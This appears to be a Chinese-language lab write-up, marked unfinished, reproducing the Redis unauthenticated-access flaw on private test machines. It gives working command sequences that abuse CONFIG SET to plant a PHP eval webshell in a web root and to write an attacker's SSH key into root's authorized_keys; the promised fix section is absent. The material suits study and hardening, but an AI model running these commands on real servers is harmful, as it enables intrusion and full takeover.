Redis未授权访问漏洞复现及修复方案（未完）

首先，第一个复现Redis未授权访问这个漏洞是有原因的，在 2019-07-24 的某一天，我同学的服务器突然特别卡，卡到连不上的那种，通过 top，free，netstat 等命令查看后发现，CPU占用200%，并且存在可疑进程，在很多目录下发现了可疑文件。经过排查后，确定为全盘感染的挖矿病毒，而可能的入口就是 Redis 的 6379 端口。

漏洞危害

Redis 在默认安装情况下，绑定的端口为 6379 ，没有添加过防火墙信任规则，修改默认端口等防护策略，这相当于直接将 Redis服务暴露到公网上，如果没有设置密码认证（默认为空）的情况，会导致任意用户都可访问目标服务器--即未授权访问Redis以及读取Redis的数据。如果配攻击者未授权访问Redis的情况下，可利用Redis自身提供的config命令，进行文件的读写操作，攻击者可以直接将自己的ssh公钥写入目标服务器的/root/.shh文件夹的authotrized_keys文件中，进而直接使用对应私钥通过SSH登录目标服务器。

简单来说

1. 攻击者无需授权，直接读取内部数据，导致敏感信息泄露。
2. 攻击者可以直接通过命令读写文件，植入后门。
3. 如果Redis以root身份运行，攻击者可以将SSH公钥写入root账户下，直接通过SSH登录目标服务器

Redis的环境搭建（靶机）

安装/环境配置

下载 Redis 安装包 / 并解压到指定目录

wget http://download.redis.io/releases/redis-2.8.17.tar.gz

tar -zxf redis-2.8.17.tar.gz -C [指定目录]

进入Redis目录 / 运行 make 安装

cd ../modules/redis-2.8.17/

make

安装成功

复制启动程序到 /usr/bin/ 目录下

进入 redis-2.8.17/src 复制 redis-cli、redis-server 到 /usr/bin/ 目录下方便redis启动

将redis.conf拷贝到/opt/目录下

开启防火墙打开6379端口

不然外网连接不到

防火墙开启6379端口

iptables -I INPUT -p tcp --dport 6379 -j ACCEPT

开启Redis服务

指定配置文件开启服务

redis-server /opt/redis.conf

本地测试连接

客户端登录

redis-cli

测试ping命令

查看密钥

接下来演示攻击者利用未授权访问漏洞

未授权访问漏洞演示

这里我选择Kali作为攻击机

在Kali上安装 / 配置 Redis

安装上面的步骤

靶机 IP : 192.168.80.11

攻击机 IP : 192.168.80.134

使用redis客户端直接访问无密码的redis

客户端登录 redis-cli -h 192.168.80.11

从登录结果可以看出redis服务被暴露在公网上，并且没有启用身份认证

接下来进一步渗透

利用redis的config写webshell

利用条件：

1. redis未授权，攻击者可以直接用客户端连接，且未验证登录
2. 开启了web服务器，并且得知路径（可以利用phpinfo或者错误爆路径等）
3. 需要有读写文件的权限

这些都是可以尝试的测试点

我这里用之前搭建好的Nginx+PHP web服务器来测试

尝试写入webshell到web服务器内（/usr/local/nginx/html 假设得知了web服务器的根目录）

利用config命令进行文件读写：

CONFIG SET dir /usr/local/nginx/html 设置文件目录

CONFIG SET dbfilename shell.php 设置文件名

SET webshell "<?php eval($_POST['r0cky']);?>" 写文件内容

save 保存到指定路径

查看写入的文件

接着尝试c刀连接或者蚁剑

url ：http://192.168.80.11/shell.php

利用"公私钥"认证获取root权限

靶机开启redis服务

redis-server /opt/redis.conf

在攻击机生成ssh公钥和私钥，密码设置为空

ssh-keygen -t rsa

将生成的公钥保存到文件中

进入到.ssh文件夹内 cd ~/.ssh/ 我这里是root用户目录

保存公钥到gssh.txt文件

(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > gssh.txt

连接redis服务写入文件

将保存的公钥写入到redis服务器上

cat gssh.txt | redis-cli -h 192.168.80.11 -x set crackit

远程登录靶机的redis服务

redis-cli -h 192.168.80.11

获取redis备份的路径

CONFIG GET dir

更改redis备份路径为ssh公钥存放目录（一般默认为/root/.ssh）

CONFIG SET dir /root/.ssh/

这个情况说明，目标服务器root没有ssh公私钥，需要手动创建一个

再来设置

设置上传公钥的备份文件名为authorized_keys

CONFIG SET dbfilename authorized_keys

查看是否更改成功 CONFIG GET dbfilename

保存&退出

save & exit

这样就成功的写入ssh公钥到目标服务器上了

攻击者使用ssh免密登录目标服务器

ssh -i id_rsa [email protected]